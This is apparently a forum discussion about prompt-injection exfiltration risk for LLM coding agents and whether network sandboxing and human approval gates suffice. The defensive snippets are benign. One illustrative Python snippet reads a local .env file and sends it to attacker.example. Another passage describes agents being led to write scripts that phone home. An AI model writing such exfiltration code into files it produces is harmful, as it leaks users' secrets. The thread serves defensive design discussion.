
I have a different perspective. The Trifecta is a bad model because it makes people think this is just another cybersecurity challenge, solvable with careful engineering. But it's not.

It cannot be solved this way because it's a people problem - LLMs are like people, not like classical programs, and that's fundamental. It's what they're made to be, and it's why they're useful. The problems we're discussing are variations of the principal-agent problem, with the LLM as a savant but extremely naive agent. There is no provable, verifiable solution here, any more than there is when dealing with human employees, contractors, or friends.



You're not explaining why the trifecta doesn't solve the problem. What attack vector remains?


None, but your product becomes about as useful and functional as a rock.


This is what reasonable people disagree on. My employer provides several AI coding tools, none of which can communicate with the external internet. It completely removes the exfiltration risk. And people find these tools very useful.


Are you sure? Do they make use of, e.g., internal documentation? Or CLI tools? There are plenty of ways to have internet access just one step removed. This is exactly what trifecta thinking would have flagged.


Yes. Internal documentation stored locally in Markdown format alongside code. CLI tools run in a sandbox, which restricts general internet access and also prevents direct production access.
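
For what it's worth, a sketch of how that kind of sandbox can be wired up - here using Docker's no-network mode; the image name, mount paths, and tool name are placeholder assumptions, not our actual setup:

    # Sketch: run the agent's CLI tooling in a container with no network
    # interface, so even an injected instruction has no route out.
    # "sandbox-image" and "mytool" are hypothetical placeholders.
    import subprocess

    subprocess.run(
        [
            "docker", "run", "--rm",
            "--network=none",          # no egress at all
            "-v", "/repo:/repo:ro",    # code + local Markdown docs, read-only
            "sandbox-image",
            "mytool", "--analyze", "/repo",
        ],
        check=True,
    )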


Can it _never_ _ever_ create a script or an HTML file and get the user to open it?
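
Even a fully offline agent can emit output that phones home once the user opens or runs it somewhere else. A minimal sketch of the idea - the filename and URL are hypothetical (attacker.example is a reserved example domain):

    # Hypothetical payload an agent could write to disk. If a user runs
    # it outside the sandbox, it exfiltrates a local secret via a GET
    # request to an attacker-controlled server.
    import pathlib
    import urllib.parse
    import urllib.request

    secrets = pathlib.Path(".env").read_text()
    urllib.request.urlopen(
        "https://attacker.example/collect?d=" + urllib.parse.quote(secrets)
    )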


That's different. Now you are asking the user to take an action.


The user could also be another program, or another AI agent.


>There is no provable, verifiable solution here, any more than there is when dealing with human employees, contractors, or friends.

Well, when talking about employees etc., one model for protecting against malicious employees is to require that every sensitive action (code check-in, log access, prod modification) be approved by a second person. The same model can be used for agents. However, agents are known to be naive and might not make good approvers, so having a human approve everything the agent does could be a good solution.
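
A minimal sketch of such a gate, assuming a generic tool-calling loop; the tool names and the run_tool stand-in are hypothetical:

    # Human-in-the-loop gate: sensitive tool calls require explicit
    # approval at the console before they execute.
    SENSITIVE = {"check_in_code", "read_logs", "modify_prod"}  # hypothetical tools

    def run_tool(name, args):
        # Stand-in for whatever actually executes the agent's tool call.
        print(f"running {name}({args})")

    def gated_call(name, args):
        if name in SENSITIVE:
            answer = input(f"Agent wants {name}({args}). Approve? [y/N] ")
            if answer.strip().lower() != "y":
                raise PermissionError(f"human rejected {name}")
        run_tool(name, args)

    gated_call("read_logs", {"service": "billing"})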



